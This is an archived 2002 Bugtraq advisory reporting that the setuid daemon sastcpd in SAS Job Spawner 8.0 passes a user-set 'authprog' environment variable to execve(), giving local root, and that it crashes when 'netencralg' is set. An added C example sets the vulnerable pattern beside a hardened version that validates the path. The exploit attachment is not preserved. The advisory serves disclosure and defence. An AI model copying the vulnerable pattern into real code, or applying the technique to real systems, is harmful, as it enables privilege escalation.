[24038] in bugtraq


sastcpd 8.0 'authprog' local root vulnerability

daemon@ATHENA.MIT.EDU (rpc)
Wed Jan 30 18:06:11 2002

Date: Wed, 30 Jan 2002 22:40:58 -0800
From: rpc <rpc@unholy.net>
To: bugtraq@securityfocus.com
Cc: rpc@unholy.net
Message-Id: <20020130224058.0bf23012.rpc@unholy.net>
Hi,

Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software were available to test. Sorry.

authprog vulnerability
----------------------

The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid. A sample 'exploit' is attached.

netencralg vulnerability
------------------------

I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any value.

All tests were run on SunOS 5.8.
Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0.

cheers,
--rpc
[Attachment: authme.sh (text/x-sh, base64-encoded); its contents are not preserved in this archive copy.]

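As an added illustration (not sastcpd's or SAS's code, and not the attached script), the pattern the report describes, a privileged program handing an environment-supplied path to execve(), placed beside a hardened alternative in C. The default path, the idea that the setting comes from a root-owned config file, and the particular checks are assumptions, not anything the advisory states about sastcpd.

```c
/* Added example, not sastcpd's code: exec a helper without trusting the environment. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define AUTHPROG_DEFAULT "/usr/local/lib/sastcpd/authprog"  /* assumed; real path not given */
/* The reported pattern: the path handed to execve() comes straight from the
 * caller's environment, so under setuid root the caller picks the binary. */
const char *authprog_vulnerable(void)
{
    return getenv("authprog");
}

/* Lexical checks: absolute, bounded length, no ".." component. Returns 1 if OK. */
int authprog_path_ok(const char *p)
{
    if (p == NULL || p[0] != '/' || strlen(p) >= 256) return 0;
    for (const char *s = p; *s; s++)          /* s[-1] is only read once s > p */
        if (s[0] == '.' && s[1] == '.' && s[-1] == '/' &&
            (s[2] == '/' || s[2] == '\0'))
            return 0;
    return 1;
}

/* Filesystem checks: regular file, root-owned, not group/world writable. */
int authprog_file_ok(const char *p)
{
    struct stat st;
    if (!authprog_path_ok(p) || stat(p, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode) || st.st_uid != 0) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) ? 0 : 1;
}

/* Hardened: 'cfg' comes from a root-owned config, never getenv(); bad values fall back. */
const char *choose_authprog(const char *cfg)
{
    return authprog_file_ok(cfg) ? cfg : AUTHPROG_DEFAULT;
}

/* Exec with a fixed, minimal environment; returns -1 only on failure. */
int run_authprog(const char *cfg, char *const argv[])
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    const char *prog = choose_authprog(cfg);
    if (!authprog_file_ok(prog)) return -1;   /* default missing or unsafe too */
    execve(prog, argv, envp);
    return -1;
}
```

The same checks apply whether the setting is 'authprog' or any other name a privileged daemon reads before exec: reject it unless it is an absolute, root-owned, non-writable regular file, and never source it from the invoking user's environment.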

